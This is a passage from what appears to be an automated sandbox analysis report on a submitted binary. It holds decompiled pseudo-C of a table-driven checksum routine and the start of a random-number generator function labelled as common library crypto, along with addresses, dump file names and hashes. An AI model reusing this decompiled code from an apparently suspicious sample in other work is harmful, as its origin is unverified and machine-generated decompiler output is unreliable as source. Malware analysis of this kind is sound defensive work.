*(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t110 & 0x000000ff) * 4) ^  *(_t175 + 0x14);
						_t175 = _t175 + 0x20;
						_t119 =  *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8);
						_t232 = _t232 - 0x20;
						_t87 =  *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t119 >> 0x18) * 4) ^  *(0x41a4d8 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t119 >> 0x18) * 4) ^  *(0x41a4d8 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t207 >> 0x18) * 4) ^  *(0x41a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t119 >> 0x18) * 4) ^  *(0x41a4d8 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t216 & 0x000000ff) * 4);
						_t231 = _t231 - 1;
					} while (_t231 != 0);
				}
				if(_t232 >= 4) {
					_t181 = _t232 >> 2;
					do {
						_t90 = _t87 ^  *_t175;
						_t175 = _t175 + 4;
						_t232 = _t232 - 4;
						_t181 = _t181 - 1;
						_t87 =  *(0x419cd8 + (_t90 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (_t90 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (_t90 >> 0x18) * 4) ^  *(0x41a4d8 + (_t90 & 0x000000ff) * 4);
					} while (_t181 != 0);
				}
				if(_t232 != 0) {
					do {
						_t87 = _t87 >> 0x00000008 ^  *(0x4198d8 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t232 = _t232 - 1;
					} while (_t232 != 0);
				}
				return  !_t87;
			}

0x00413120
0x00413121
0x00413123
0x00413127
0x00413130
0x00413143
0x0041314a
0x0041314b
0x0041314c
0x00000000
0x00000000
0x00000000
0x0041314c
0x00413130
0x0041314e
0x00413153
0x0041315b
0x00413160
0x0041329a
0x004132d9
0x004132dc
0x004132df
0x00413356
0x0041335d
0x0041335d
0x00413160
0x00413367
0x0041336b
0x00413370
0x00413370
0x00413372
0x004133b1
0x004133b4
0x004133b5
0x004133b5
0x00413370
0x004133bd
0x004133c0
0x004133ce
0x004133d5
0x004133d6
0x004133d6
0x004133c0
0x004133dc

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44911577445264bdc0b12af38bde0a92d8df00fde89877cbcd8daae9ea7f78ca
Instruction ID: 99e612222a8e821dcb9c62a346d808d52743fdee53c0efbcb285bec9d8eb2291
Opcode Fuzzy Hash: 44911577445264bdc0b12af38bde0a92d8df00fde89877cbcd8daae9ea7f78ca
Instruction Fuzzy Hash: BA61733666255347E351CF6DECC07A63392E7CA301F1DC531CA0487666C639EA72A6C9

Uniqueness

Uniqueness Score: 0.00%

Function 004088B0, Relevance: .1, Instructions: 114
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004088B0(signed int* _a4) {
				unsigned int _v8;
				signed int _v12;

				if(_a4[0x270] >= 0x270) {
					_v12 = 0;
					while(_v12 < 0xe3) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + 0x634 + _v12 * 4) ^  *(0x41f2ac + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					while(_v12 < 0x26f) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + _v12 * 4 - 0x38c) ^  *(0x41f2ac + (_v8 & 0x00000001) * 4);
